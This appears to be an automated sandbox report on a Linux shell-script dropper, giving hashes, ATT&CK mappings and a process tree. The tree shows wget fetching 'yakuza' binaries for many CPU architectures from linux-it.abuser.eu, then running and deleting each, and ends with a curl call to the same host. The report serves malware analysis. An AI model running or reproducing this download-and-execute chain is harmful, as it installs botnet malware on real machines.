ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf

Analysis

max time kernel
149s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
24-11-2024 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh
Size

2KB
MD5

f50f60f970a5203dad27c480da7b4519
SHA1

f50f26900efe72f11c37767b5db9a3916a7c76b4
SHA256

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
SHA512

40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1515	chmod
1536	chmod
1546	chmod
1557	chmod
1564	chmod
1581	chmod
1585	chmod
1510	chmod
1595	chmod
1532	chmod
1553	chmod
1571	chmod
1525	chmod

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1506	wget
1511	yakuza.mips
1512	rm
1514	wget
1519	yakuza.mipsel
1520	rm

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh
/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh
1⤵
PID:1505
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:1506
- /bin/chmod
  chmod +x yakuza.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1510
- /tmp/yakuza.mips
  ./yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:1511
- /bin/rm
  rm -rf yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:1512
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1514
- /bin/chmod
  chmod +x yakuza.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:1515
- /tmp/yakuza.mipsel
  ./yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1519
- /bin/rm
  rm -rf yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1520
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.sh
  2⤵
  PID:1521
- /bin/chmod
  chmod +x yakuza.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/yakuza.sh
  ./yakuza.sh
  2⤵
  PID:1526
- /bin/rm
  rm -rf yakuza.sh
  2⤵
  PID:1527
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.x86
  2⤵
  PID:1528
- /bin/chmod
  chmod +x yakuza.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1532
- /tmp/yakuza.x86
  ./yakuza.x86
  2⤵
  PID:1533
- /bin/rm
  rm -rf yakuza.x86
  2⤵
  PID:1534
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm6
  2⤵
  PID:1535
- /bin/chmod
  chmod +x yakuza.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1536
- /tmp/yakuza.arm6
  ./yakuza.arm6
  2⤵
  PID:1540
- /bin/rm
  rm -rf yakuza.arm6
  2⤵
  PID:1541
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.i686
  2⤵
  PID:1542
- /bin/chmod
  chmod +x yakuza.i686
  2⤵
  - File and Directory Permissions Modification
  PID:1546
- /tmp/yakuza.i686
  ./yakuza.i686
  2⤵
  PID:1547
- /bin/rm
  rm -rf yakuza.i686
  2⤵
  PID:1548
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.ppc
  2⤵
  PID:1549
- /bin/chmod
  chmod +x yakuza.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1553
- /tmp/yakuza.ppc
  ./yakuza.ppc
  2⤵
  PID:1554
- /bin/rm
  rm -rf yakuza.ppc
  2⤵
  PID:1555
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.i586
  2⤵
  PID:1556
- /bin/chmod
  chmod +x yakuza.i586
  2⤵
  - File and Directory Permissions Modification
  PID:1557
- /tmp/yakuza.i586
  ./yakuza.i586
  2⤵
  PID:1561
- /bin/rm
  rm -rf yakuza.i586
  2⤵
  PID:1562
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.m68k
  2⤵
  PID:1563
- /bin/chmod
  chmod +x yakuza.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1564
- /tmp/yakuza.m68k
  ./yakuza.m68k
  2⤵
  PID:1565
- /bin/rm
  rm -rf yakuza.m68k
  2⤵
  PID:1566
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm4
  2⤵
  PID:1570
- /bin/chmod
  chmod +x yakuza.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:1571
- /tmp/yakuza.arm4
  ./yakuza.arm4
  2⤵
  PID:1575
- /bin/rm
  rm -rf yakuza.arm4
  2⤵
  PID:1576
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm5
  2⤵
  PID:1577
- /bin/chmod
  chmod +x yakuza.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1581
- /tmp/yakuza.arm5
  ./yakuza.arm5
  2⤵
  PID:1582
- /bin/rm
  rm -rf yakuza.arm5
  2⤵
  PID:1583
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm7
  2⤵
  PID:1584
- /bin/chmod
  chmod +x yakuza.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1585
- /tmp/yakuza.arm7
  ./yakuza.arm7
  2⤵
  PID:1586
- /bin/rm
  rm -rf yakuza.arm7
  2⤵
  PID:1587
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.sparc
  2⤵
  PID:1591
- /bin/chmod
  chmod +x yakuza.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:1595
- /tmp/yakuza.sparc
  ./yakuza.sparc
  2⤵
  PID:1599
- /bin/rm
  rm -rf yakuza.sparc
  2⤵
  PID:1600
- /bin/bash
  bash
  2⤵
  PID:1602
- /usr/bin/curl
  curl -s http://linux-it.abuser.eu/test.php
  2⤵
  PID:1601

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads